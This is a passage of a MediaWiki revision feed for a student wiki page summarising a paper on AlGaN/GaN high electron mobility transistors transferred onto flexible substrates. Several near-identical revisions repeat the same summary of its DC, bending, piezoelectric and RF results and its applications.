This 2 observations are '''due to the poor thermal conductivity of the polymer''' which form the flexible tape. In order to confirm this hypothesis, they decided to plot the C-V profile. They show that no deviation is observed in C-V profile in terms of frequency dispersion and charges density. They confirm that the '''2-DEG density is not affected and assume that no additional defects are created during the transfer'''.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
After this study, they try to show '''the effect of the bending''' on the DC characteristics. They explain that the characteristics are not the same if the flexible tape is flat or  if it is bent. They realize the bending with a semicylindrical chuck '''(chuck''' : place where you put the wafer on - '''wafer''' : silicium disc where all devices are engraved) with 15 mm raduis of curvature. With this chuck, strain is in the gate direction. The effect on the I-V characteristic is light. And due to the difference between the thermal conductivity between the 2 chucks they use for analysis, they do analysis with a low drain-source voltage. They show that the on-resistance (Ron) is decreased, and the sheet resistance (Rs - 11% decrease) also. It is due to the increase of 2-DEG density (in 2-DEG, the parameter which translate the mobility of the electron (&amp;amp;#x03bc;n) increased, and sheet resistance is directly close to this parameter)&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
In a thrid part, they try to characterize the piezoelectric behavior of the transistor in flat and bent configuration. All semiconductors which are in III-N column of Mendeleiev Table of Elements is piezoelectric. It means that any deformation or strain involve a tension inside the semiconductor.&amp;lt;br /&amp;gt;&lt;br /&gt;
They show an '''increase of 6% of 2-DEG density'''. They deduce that the convex (or concave) configuration involve an increase of 6% of 2-DEG density, so involve a tension.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Finally, they study RF characteristics of this kind of transistor. They show '''a difference of 8 GHz between the theoretical cutoff frequency (40 GHz) and the experimental cutoff frequency (32 GHz)'''. This difference is due to the approximation to determine the gate-to-2-DEG capacitance and the gate-to-drain capacitance, which are used in the small-signal model of a transistor.&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Main contribution =&lt;br /&gt;
&amp;lt;p&amp;gt; This article has the objective to show the implementation of transistors on a flexible substrate.&amp;lt;br /&amp;gt;&lt;br /&gt;
The main contribution of this project is the use of method for making a transistor, not on a rigid substrate but on a flexible substrate.&amp;lt;br /&amp;gt;&lt;br /&gt;
Authors show that it is possible to transfer a transistor, which had growing on a rigid substrate, on a flexible substrate, and have the same performances.&lt;br /&gt;
In addition, the piezoelectric effect adds performances when the transistor is under strain.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Applications =&lt;br /&gt;
With an industrial asking to have more and more of large bandwidth, HEMT are very used in the industry of telecommunication, for '''3G or 4G technology'''. With their abilities to work at high-frequency, HEMTs are also used in '''radio-astronomy and radars, and in general all application with low noise and maximun of power.''' &amp;lt;br /&amp;gt;&lt;br /&gt;
But this is not the only field in which we use HEMT.&amp;lt;br /&amp;gt;&lt;br /&gt;
Transfer HEMT, from a rigid substrate to a flexible substrate can allow us to do electronics '''PCB more light''', more flexible, with the same RF and DC performances than a PCB with classic transistors. The flexible substrate provides to the PCB RF and DC performances when it is strained (flat or bent). In a compact package, this is a good solution to '''match space and complexity''' (a lot of wires or circuits with a small space can be possible now with flexible circuits).&amp;lt;br /&amp;gt;&lt;br /&gt;
Another application is for flexible display. For example, in LCD fabrication, glass is used as substrate. Now, with flexible substrate, we are able to make '''flexible LED''' (flexible OLED for flexible Organic LED) in order to make '''flexible LCD screen''', as thin as a paper&amp;lt;br /&amp;gt;&lt;br /&gt;
Another example is for developping '''solar cells'''. You can developp solar cells with flexible circuits. This solar cells are light, and very easy to deploy.&amp;lt;br /&amp;gt;&lt;br /&gt;
HEMTs on a flexible support is a good way to mix medium power, high frequency, and flexibility.&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=AlGaN/GaN_HEMTs&amp;diff=32125</id>
		<title>AlGaN/GaN HEMTs</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=AlGaN/GaN_HEMTs&amp;diff=32125"/>
				<updated>2016-06-14T15:03:34Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : /* Applications */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
= Summary =&lt;br /&gt;
&amp;lt;p&amp;gt; This article is talking about '''AlGaN/GaN high electron mobility transistor (HEMT)'''. It is an heretostructure field effect transistor (HFET).&amp;lt;br /&amp;gt;&lt;br /&gt;
This kind of transistor allows to the electron a best mobility. In fact, a heterojunction with a '''highly n-doped bandgap''' (here AlGaN) and '''a undoped bandgap''' (here GaN) allows to electrons to go faster on the other side. The layer between this 2 sides is called '''2-DEG (two-dimensional electron gas)'''.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Authors introduces first the subject, their target, and how fabricate this kind of transistor. It's a molecular beam epitaxy. A 21-nm AlGaN barrier is grown on a silicon substrate. In a second time, this barrier is processed on a rigid Si substrate by lithography. Only after this 2 steps, the transistor is transferred on a flexible substrate.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
After an explanation of DC characteristics of the transistor on a Silicium (Si) subtrate, they explain '''the effect of the transfer on a flexible substrate''' on the DC transistor characteristics. They try to explain all changes on the Ids-Vds characteristics, on C-V ('''Capacitance = f(Gate voltage)''') profile, on the Nd-Na profile ('''Nd-Na : representative of doping level'''), in order to show which parameters are modified, and what are the consequences of this modifications.&amp;lt;br /&amp;gt;&lt;br /&gt;
The first observation is on the maximum drain current density. It drops down when the transistor is transferred on a flexible substrate (930 mA/mm before, 450 mA/mm after the transfer).&lt;br /&gt;
The second observation is the behavior of the transfer characteristics. It does not follow the ideal transfer characteristics.&amp;lt;br /&amp;gt;&lt;br /&gt;
This 2 observations are '''due to the poor thermal conductivity of the polymer''' which form the flexible tape. In order to confirm this hypothesis, they decided to plot the C-V profile. They show that no deviation is observed in C-V profile in terms of frequency dispersion and charges density. They confirm that the '''2-DEG density is not affected and assume that no additional defects are created during the transfer'''.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
After this study, they try to show '''the effect of the bending''' on the DC characteristics. They explain that the characteristics are not the same if the flexible tape is flat or  if it is bent. They realize the bending with a semicylindrical chuck '''(chuck''' : place where you put the wafer on - '''wafer''' : silicium disc where all devices are engraved) with 15 mm raduis of curvature. With this chuck, strain is in the gate direction. The effect on the I-V characteristic is light. And due to the difference between the thermal conductivity between the 2 chucks they use for analysis, they do analysis with a low drain-source voltage. They show that the on-resistance (Ron) is decreased, and the sheet resistance (Rs - 11% decrease) also. It is due to the increase of 2-DEG density (in 2-DEG, the parameter which translate the mobility of the electron (&amp;amp;#x03bc;n) increased, and sheet resistance is directly close to this parameter)&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
In a thrid part, they try to characterize the piezoelectric behavior of the transistor in flat and bent configuration. All semiconductors which are in III-N column of Mendeleiev Table of Elements is piezoelectric. It means that any deformation or strain involve a tension inside the semiconductor.&amp;lt;br /&amp;gt;&lt;br /&gt;
They show an '''increase of 6% of 2-DEG density'''. They deduce that the convex (or concave) configuration involve an increase of 6% of 2-DEG density, so involve a tension.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Finally, they study RF characteristics of this kind of transistor. They show '''a difference of 8 GHz between the theoretical cutoff frequency (40 GHz) and the experimental cutoff frequency (32 GHz)'''. This difference is due to the approximation to determine the gate-to-2-DEG capacitance and the gate-to-drain capacitance, which are used in the small-signal model of a transistor.&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Main contribution =&lt;br /&gt;
&amp;lt;p&amp;gt; This article has the objective to show the implementation of transistors on a flexible substrate.&amp;lt;br /&amp;gt;&lt;br /&gt;
The main contribution of this project is the use of method for making a transistor, not on a rigid substrate but on a flexible substrate.&amp;lt;br /&amp;gt;&lt;br /&gt;
Authors show that it is possible to transfer a transistor, which had growing on a rigid substrate, on a flexible substrate, and have the same performances.&lt;br /&gt;
In addition, the piezoelectric effect adds performances when the transistor is under strain.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Applications =&lt;br /&gt;
With an industrial asking to have more and more of large bandwidth, HEMT are very used in the industry of telecommunication, for '''3G or 4G technology'''. With their abilities to work at high-frequency, HEMTs are also used in '''radio-astronomy and radars, and in general all application with low noise and maximun of power.''' &amp;lt;br /&amp;gt;&lt;br /&gt;
But this is not the only field in which we use HEMT.&amp;lt;br /&amp;gt;&lt;br /&gt;
Transfer HEMT, from a rigid substrate to a flexible substrate can allow us to do electronics '''PCB more light''', more flexible, with the same RF and DC performances than a PCB with classic transistors. The flexible substrate provides to the PCB RF and DC performances when it is strained (flat or bent). In a compact package, this is a good solution to '''match space and complexity''' (a lot of wires or circuits with a small space can be possible now with flexible circuits).&amp;lt;br /&amp;gt;&lt;br /&gt;
Another application is for flexible display. For example, in LCD fabrication, glass is used as substrate. Now, with flexible substrate, we are able to make '''flexible LED''' (flexible OLED for flexible Organic LED) in order to make '''flexible LCD screen''', as thin as a paper&amp;lt;br /&amp;gt;&lt;br /&gt;
Another example is for developping '''solar cells'''. You can developp solar cells with flexible circuits. This solar cells are light, and very easy to deploy.&amp;lt;br /&amp;gt;&lt;br /&gt;
HEMTs on a flexible support is a good way to mix medium power, high frequency, and flexibility.&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=AlGaN/GaN_HEMTs&amp;diff=32124</id>
		<title>AlGaN/GaN HEMTs</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=AlGaN/GaN_HEMTs&amp;diff=32124"/>
				<updated>2016-06-14T14:59:30Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : /* Summary */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
= Summary =&lt;br /&gt;
&amp;lt;p&amp;gt; This article is talking about '''AlGaN/GaN high electron mobility transistor (HEMT)'''. It is an heretostructure field effect transistor (HFET).&amp;lt;br /&amp;gt;&lt;br /&gt;
This kind of transistor allows to the electron a best mobility. In fact, a heterojunction with a '''highly n-doped bandgap''' (here AlGaN) and '''a undoped bandgap''' (here GaN) allows to electrons to go faster on the other side. The layer between this 2 sides is called '''2-DEG (two-dimensional electron gas)'''.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Authors introduces first the subject, their target, and how fabricate this kind of transistor. It's a molecular beam epitaxy. A 21-nm AlGaN barrier is grown on a silicon substrate. In a second time, this barrier is processed on a rigid Si substrate by lithography. Only after this 2 steps, the transistor is transferred on a flexible substrate.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
After an explanation of DC characteristics of the transistor on a Silicium (Si) subtrate, they explain '''the effect of the transfer on a flexible substrate''' on the DC transistor characteristics. They try to explain all changes on the Ids-Vds characteristics, on C-V ('''Capacitance = f(Gate voltage)''') profile, on the Nd-Na profile ('''Nd-Na : representative of doping level'''), in order to show which parameters are modified, and what are the consequences of this modifications.&amp;lt;br /&amp;gt;&lt;br /&gt;
The first observation is on the maximum drain current density. It drops down when the transistor is transferred on a flexible substrate (930 mA/mm before, 450 mA/mm after the transfer).&lt;br /&gt;
The second observation is the behavior of the transfer characteristics. It does not follow the ideal transfer characteristics.&amp;lt;br /&amp;gt;&lt;br /&gt;
This 2 observations are '''due to the poor thermal conductivity of the polymer''' which form the flexible tape. In order to confirm this hypothesis, they decided to plot the C-V profile. They show that no deviation is observed in C-V profile in terms of frequency dispersion and charges density. They confirm that the '''2-DEG density is not affected and assume that no additional defects are created during the transfer'''.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
After this study, they try to show '''the effect of the bending''' on the DC characteristics. They explain that the characteristics are not the same if the flexible tape is flat or  if it is bent. They realize the bending with a semicylindrical chuck '''(chuck''' : place where you put the wafer on - '''wafer''' : silicium disc where all devices are engraved) with 15 mm raduis of curvature. With this chuck, strain is in the gate direction. The effect on the I-V characteristic is light. And due to the difference between the thermal conductivity between the 2 chucks they use for analysis, they do analysis with a low drain-source voltage. They show that the on-resistance (Ron) is decreased, and the sheet resistance (Rs - 11% decrease) also. It is due to the increase of 2-DEG density (in 2-DEG, the parameter which translate the mobility of the electron (&amp;amp;#x03bc;n) increased, and sheet resistance is directly close to this parameter)&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
In a thrid part, they try to characterize the piezoelectric behavior of the transistor in flat and bent configuration. All semiconductors which are in III-N column of Mendeleiev Table of Elements is piezoelectric. It means that any deformation or strain involve a tension inside the semiconductor.&amp;lt;br /&amp;gt;&lt;br /&gt;
They show an '''increase of 6% of 2-DEG density'''. They deduce that the convex (or concave) configuration involve an increase of 6% of 2-DEG density, so involve a tension.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Finally, they study RF characteristics of this kind of transistor. They show '''a difference of 8 GHz between the theoretical cutoff frequency (40 GHz) and the experimental cutoff frequency (32 GHz)'''. This difference is due to the approximation to determine the gate-to-2-DEG capacitance and the gate-to-drain capacitance, which are used in the small-signal model of a transistor.&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Main contribution =&lt;br /&gt;
&amp;lt;p&amp;gt; This article has the objective to show the implementation of transistors on a flexible substrate.&amp;lt;br /&amp;gt;&lt;br /&gt;
The main contribution of this project is the use of method for making a transistor, not on a rigid substrate but on a flexible substrate.&amp;lt;br /&amp;gt;&lt;br /&gt;
Authors show that it is possible to transfer a transistor, which had growing on a rigid substrate, on a flexible substrate, and have the same performances.&lt;br /&gt;
In addition, the piezoelectric effect adds performances when the transistor is under strain.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Applications =&lt;br /&gt;
With an industrial asking to have more and more of large bandwidth, HEMT are very used in the industry of telecommunication, for 3G or 4G technology. &amp;lt;br /&amp;gt;&lt;br /&gt;
But this is not the only field in which we use HEMT.&amp;lt;br /&amp;gt;&lt;br /&gt;
Transfer HEMT, from a rigid substrate to a flexible substrate can allow us to do electronics PCB more light, more flexible, with the same RF and DC performances than a PCB with classic transistors. The flexible substrate provides to the PCB RF and DC performances when it is strained (flat or bent). In a compact package, this is a good solution to match space and complexity (a lot of wires or circuits with a small space can be possible now with flexible circuits).&amp;lt;br /&amp;gt;&lt;br /&gt;
Another application is for flexible display. For example, in LCD fabrication, glass is used as substrate. Now, with flexible substrate, we are able to make flexible LED (flexible OLED for flexible Organic LED) in order to make LCD flexible screen, as thin as a paper&amp;lt;br /&amp;gt;&lt;br /&gt;
Another example is for developping solar cells. You can developp solar cells with flexible circuits. This solar cells are light, and very easy to deploy.&amp;lt;br /&amp;gt;&lt;br /&gt;
HEMTs on a flexible support is a good way to mix medium power, high frequency, and flexibility.&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=AlGaN/GaN_HEMTs&amp;diff=32122</id>
		<title>AlGaN/GaN HEMTs</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=AlGaN/GaN_HEMTs&amp;diff=32122"/>
				<updated>2016-06-14T14:50:12Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : /* Summary */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
= Summary =&lt;br /&gt;
&amp;lt;p&amp;gt; This article is talking about '''AlGaN/GaN high electron mobility transistor (HEMT)'''. It is an heretostructure field effect transistor (HFET).&amp;lt;br /&amp;gt;&lt;br /&gt;
This kind of transistor allows to the electron a best mobility. In fact, a heterojunction with a '''highly n-doped bandgap''' (here AlGaN) and '''a undoped bandgap''' (here GaN) allows to electrons to go faster on the other side. The layer between this 2 sides is called '''2-DEG (two-dimensional electron gas)'''.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Authors introduces first the subject, their target, and how fabricate this kind of transistor. It's a molecular beam epitaxy. A 21-nm AlGaN barrier is grown on a silicon substrate. In a second time, this barrier is processed on a rigid Si substrate by lithography. Only after this 2 steps, the transistor is transferred on a flexible substrate.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
After an explanation of DC characteristics of the transistor on a Silicium (Si) subtrate, they explain '''the effect of the transfer on a flexible substrate''' on the DC transistor characteristics. They try to explain all changes on the Ids-Vds characteristics, on C-V profile, on the Nd-Na profile, in order to show which parameters are modified, and what are the consequences of this modifications.&amp;lt;br /&amp;gt;&lt;br /&gt;
The first observation is on the maximum drain current density. It drops down when the transistor is transferred on a flexible substrate (930 mA/mm before, 450 mA/mm after the transfer).&lt;br /&gt;
The second observation is the behavior of the transfer characteristics. It does not follow the ideal transfer characteristics.&amp;lt;br /&amp;gt;&lt;br /&gt;
This 2 observations are '''due to the poor thermal conductivity of the polymer''' which form the flexible tape. In order to confirm this hypothesis, they decided to plot the C-V profile. They show that no deviation is observed in C-V profile in terms of frequency dispersion and charges density. They confirm that the '''2-DEG density is not affected and assume that no additional defects are created during the transfer'''.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
After this study, they try to show '''the effect of the bending''' on the DC characteristics. They explain that the characteristics are not the same if the flexible tape is flat or  if it is bent. They realize the bending with a semicylindrical chuck with 15 mm raduis of curvature. With this chuck, strain is in the gate direction. The effect on the I-V characteristic is light. And due to the difference between the thermal conductivity between the 2 chuck they use for analysis, they do analysis with a low drain-source voltage. They show that the on-resistance (Ron) is decreased, and the sheet resistance (Rs - 11% decrease) also. It is due to the increase of 2-DEG density (in 2-DEG, the parameter which translate the mobility of the electron (&amp;amp;#x03bc;n) increased, and sheet resistance is directly close to this parameter)&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
In a thrid part, they try to characterize the peizoelectric behavior of the transistor in flat and bent configuration. All semiconductors which are in III-N column of Mendeleiev Table of Elements is piezoelectric. It means that any deformation or strain involve a tension inside the semiconductor.&amp;lt;br /&amp;gt;&lt;br /&gt;
They show that an '''increase of 6% of 2-DEG density'''. They deduce that the convex configuration involve an increase of 6% of 2-DEG density, so involve a tension.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Finally, they study RF characteristics of this kind of transistor. They show '''a difference of 8 GHz between the theoretical cutoff frequency (40 GHz) and the experimental cutoff frequency (32 GHz)'''. This difference is due to the approximation to determine the gate-to-2-DEG capacitance and the gate-to-drain capacitance, which are used in the little-signal model of a transistor.&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Main contribution =&lt;br /&gt;
&amp;lt;p&amp;gt; This article has the objective to show the implementation of transistors on a flexible substrate.&amp;lt;br /&amp;gt;&lt;br /&gt;
The main contribution of this project is the use of method for making a transistor, not on a rigid substrate but on a flexible substrate.&amp;lt;br /&amp;gt;&lt;br /&gt;
Authors show that it is possible to transfer a transistor, which had growing on a rigid substrate, on a flexible substrate, and have the same performances.&lt;br /&gt;
In addition, the piezoelectric effect adds performances when the transistor is under strain.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Applications =&lt;br /&gt;
With an industrial asking to have more and more of large bandwidth, HEMT are very used in the industry of telecommunication, for 3G or 4G technology. &amp;lt;br /&amp;gt;&lt;br /&gt;
But this is not the only field in which we use HEMT.&amp;lt;br /&amp;gt;&lt;br /&gt;
Transfer HEMT, from a rigid substrate to a flexible substrate can allow us to do electronics PCB more light, more flexible, with the same RF and DC performances than a PCB with classic transistors. The flexible substrate provides to the PCB RF and DC performances when it is strained (flat or bent). In a compact package, this is a good solution to match space and complexity (a lot of wires or circuits with a small space can be possible now with flexible circuits).&amp;lt;br /&amp;gt;&lt;br /&gt;
Another application is for flexible display. For example, in LCD fabrication, glass is used as substrate. Now, with flexible substrate, we are able to make flexible LED (flexible OLED for flexible Organic LED) in order to make LCD flexible screen, as thin as a paper&amp;lt;br /&amp;gt;&lt;br /&gt;
Another example is for developping solar cells. You can developp solar cells with flexible circuits. This solar cells are light, and very easy to deploy.&amp;lt;br /&amp;gt;&lt;br /&gt;
HEMTs on a flexible support is a good way to mix medium power, high frequency, and flexibility.&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=AlGaN/GaN_HEMTs&amp;diff=32121</id>
		<title>AlGaN/GaN HEMTs</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=AlGaN/GaN_HEMTs&amp;diff=32121"/>
				<updated>2016-06-14T14:44:46Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : /* Applications */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
= Summary =&lt;br /&gt;
&amp;lt;p&amp;gt; This article is talking about '''AlGaN/GaN high electron mobility transistor (HEMT)'''. It is an heretostructure field effect transistor (HFET).&amp;lt;br /&amp;gt;&lt;br /&gt;
This kind of transistor allows to the electron a best mobility. In fact, a heterojunction with a '''highly n-doped bandgap''' (here AlGaN) and '''a undoped bandgap''' (here GaN) allow to electrons to go faster on the other side. The layer between this 2 sides is called '''2-DEG (two-dimensional electron gas)'''.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Authors introduces first the subject, their target, and how fabricate this kind of transistor. It's a molecular beam epitaxy. A 21-nm AlGaN barrier is grown on a silicon substrate. In a second time, this barrier is processed on a rigid Si substrate by lithography. Only after this 2 steps, the transistor is transferred on a flexible substrate.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
After an explanation of DC characteristics of the transistor on a Silicium (Si) subtrate, they explain '''the effect of the transfer on a flexible substrate''' on the DC transistor characteristics. They try to explain all changes on the Ids-Vds characteristics, on C-V profile, on the Nd-Na profile, in order to show which parameters are modified, and what are the consequences of this modifications.&amp;lt;br /&amp;gt;&lt;br /&gt;
The first observation is on the maximum drain current density. It drops down when the transistor is transferred on a flexible substrate (930 mA/mm before, 450 mA/mm after the transfer).&lt;br /&gt;
The second observation is the behavior of the transfer characteristics. It does not follow the ideal transfer characteristics.&amp;lt;br /&amp;gt;&lt;br /&gt;
This 2 observations are '''due to the poor thermal conductivity of the polymer''' which form the flexible tape. In order to confirm this hypothesis, they decided to plot the C-V profile. They show that no deviation is observed in C-V profile in terms of frequency dispersion and charges density. They confirm that the '''2-DEG density is not affected and assume that no additional defects are created during the transfer'''.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
After this study, they try to show '''the effect of the bending''' on the DC characteristics. They explain that the characteristics are not the same if the flexible tape is flat or  if it is bent. They realize the bending with a semicylindrical chuck with 15 mm raduis of curvature. With this chuck, strain is in the gate direction. The effect on the I-V characteristic is light. And due to the difference between the thermal conductivity between the 2 chuck they use for analysis, they do analysis with a low drain-source voltage. They show that the on-resistance (Ron) is decreased, and the sheet resistance (Rs - 11% decrease) also. It is due to the increase of 2-DEG density (in 2-DEG, the parameter which translate the mobility of the electron (&amp;amp;#x03bc;n) increased, and sheet resistance is directly close to this parameter)&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
In a thrid part, they try to characterize the peizoelectric behavior of the transistor in flat and bent configuration. All semiconductors which are in III-N column of Mendeleiev Table of Elements is piezoelectric. It means that any deformation or strain involve a tension inside the semiconductor.&amp;lt;br /&amp;gt;&lt;br /&gt;
They show that an '''increase of 6% of 2-DEG density'''. They deduce that the convex configuration involve an increase of 6% of 2-DEG density, so involve a tension.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Finally, they study RF characteristics of this kind of transistor. They show '''a difference of 8 GHz between the theoretical cutoff frequency (40 GHz) and the experimental cutoff frequency (32 GHz)'''. This difference is due to the approximation to determine the gate-to-2-DEG capacitance and the gate-to-drain capacitance, which are used in the little-signal model of a transistor.&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Main contribution =&lt;br /&gt;
&amp;lt;p&amp;gt; This article has the objective to show the implementation of transistors on a flexible substrate.&amp;lt;br /&amp;gt;&lt;br /&gt;
The main contribution of this project is the use of method for making a transistor, not on a rigid substrate but on a flexible substrate.&amp;lt;br /&amp;gt;&lt;br /&gt;
Authors show that it is possible to transfer a transistor, which had growing on a rigid substrate, on a flexible substrate, and have the same performances.&lt;br /&gt;
In addition, the piezoelectric effect adds performances when the transistor is under strain.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Applications =&lt;br /&gt;
With an industrial asking to have more and more of large bandwidth, HEMT are very used in the industry of telecommunication, for 3G or 4G technology. &amp;lt;br /&amp;gt;&lt;br /&gt;
But this is not the only field in which we use HEMT.&amp;lt;br /&amp;gt;&lt;br /&gt;
Transfer HEMT, from a rigid substrate to a flexible substrate can allow us to do electronics PCB more light, more flexible, with the same RF and DC performances than a PCB with classic transistors. The flexible substrate provides to the PCB RF and DC performances when it is strained (flat or bent). In a compact package, this is a good solution to match space and complexity (a lot of wires or circuits with a small space can be possible now with flexible circuits).&amp;lt;br /&amp;gt;&lt;br /&gt;
Another application is for flexible display. For example, in LCD fabrication, glass is used as substrate. Now, with flexible substrate, we are able to make flexible LED (flexible OLED for flexible Organic LED) in order to make LCD flexible screen, as thin as a paper&amp;lt;br /&amp;gt;&lt;br /&gt;
Another example is for developping solar cells. You can developp solar cells with flexible circuits. This solar cells are light, and very easy to deploy.&amp;lt;br /&amp;gt;&lt;br /&gt;
HEMTs on a flexible support is a good way to mix medium power, high frequency, and flexibility.&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=AlGaN/GaN_HEMTs&amp;diff=32118</id>
		<title>AlGaN/GaN HEMTs</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=AlGaN/GaN_HEMTs&amp;diff=32118"/>
				<updated>2016-06-14T14:40:49Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : /* Applications */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
= Summary =&lt;br /&gt;
&amp;lt;p&amp;gt; This article is talking about '''AlGaN/GaN high electron mobility transistor (HEMT)'''. It is an heretostructure field effect transistor (HFET).&amp;lt;br /&amp;gt;&lt;br /&gt;
This kind of transistor allows to the electron a best mobility. In fact, a heterojunction with a '''highly n-doped bandgap''' (here AlGaN) and '''a undoped bandgap''' (here GaN) allow to electrons to go faster on the other side. The layer between this 2 sides is called '''2-DEG (two-dimensional electron gas)'''.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Authors introduces first the subject, their target, and how fabricate this kind of transistor. It's a molecular beam epitaxy. A 21-nm AlGaN barrier is grown on a silicon substrate. In a second time, this barrier is processed on a rigid Si substrate by lithography. Only after this 2 steps, the transistor is transferred on a flexible substrate.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
After an explanation of DC characteristics of the transistor on a Silicium (Si) subtrate, they explain '''the effect of the transfer on a flexible substrate''' on the DC transistor characteristics. They try to explain all changes on the Ids-Vds characteristics, on C-V profile, on the Nd-Na profile, in order to show which parameters are modified, and what are the consequences of this modifications.&amp;lt;br /&amp;gt;&lt;br /&gt;
The first observation is on the maximum drain current density. It drops down when the transistor is transferred on a flexible substrate (930 mA/mm before, 450 mA/mm after the transfer).&lt;br /&gt;
The second observation is the behavior of the transfer characteristics. It does not follow the ideal transfer characteristics.&amp;lt;br /&amp;gt;&lt;br /&gt;
This 2 observations are '''due to the poor thermal conductivity of the polymer''' which form the flexible tape. In order to confirm this hypothesis, they decided to plot the C-V profile. They show that no deviation is observed in C-V profile in terms of frequency dispersion and charges density. They confirm that the '''2-DEG density is not affected and assume that no additional defects are created during the transfer'''.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
After this study, they try to show '''the effect of the bending''' on the DC characteristics. They explain that the characteristics are not the same if the flexible tape is flat or  if it is bent. They realize the bending with a semicylindrical chuck with 15 mm raduis of curvature. With this chuck, strain is in the gate direction. The effect on the I-V characteristic is light. And due to the difference between the thermal conductivity between the 2 chuck they use for analysis, they do analysis with a low drain-source voltage. They show that the on-resistance (Ron) is decreased, and the sheet resistance (Rs - 11% decrease) also. It is due to the increase of 2-DEG density (in 2-DEG, the parameter which translate the mobility of the electron (&amp;amp;#x03bc;n) increased, and sheet resistance is directly close to this parameter)&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
In a thrid part, they try to characterize the peizoelectric behavior of the transistor in flat and bent configuration. All semiconductors which are in III-N column of Mendeleiev Table of Elements is piezoelectric. It means that any deformation or strain involve a tension inside the semiconductor.&amp;lt;br /&amp;gt;&lt;br /&gt;
They show that an '''increase of 6% of 2-DEG density'''. They deduce that the convex configuration involve an increase of 6% of 2-DEG density, so involve a tension.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Finally, they study RF characteristics of this kind of transistor. They show '''a difference of 8 GHz between the theoretical cutoff frequency (40 GHz) and the experimental cutoff frequency (32 GHz)'''. This difference is due to the approximation to determine the gate-to-2-DEG capacitance and the gate-to-drain capacitance, which are used in the little-signal model of a transistor.&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Main contribution =&lt;br /&gt;
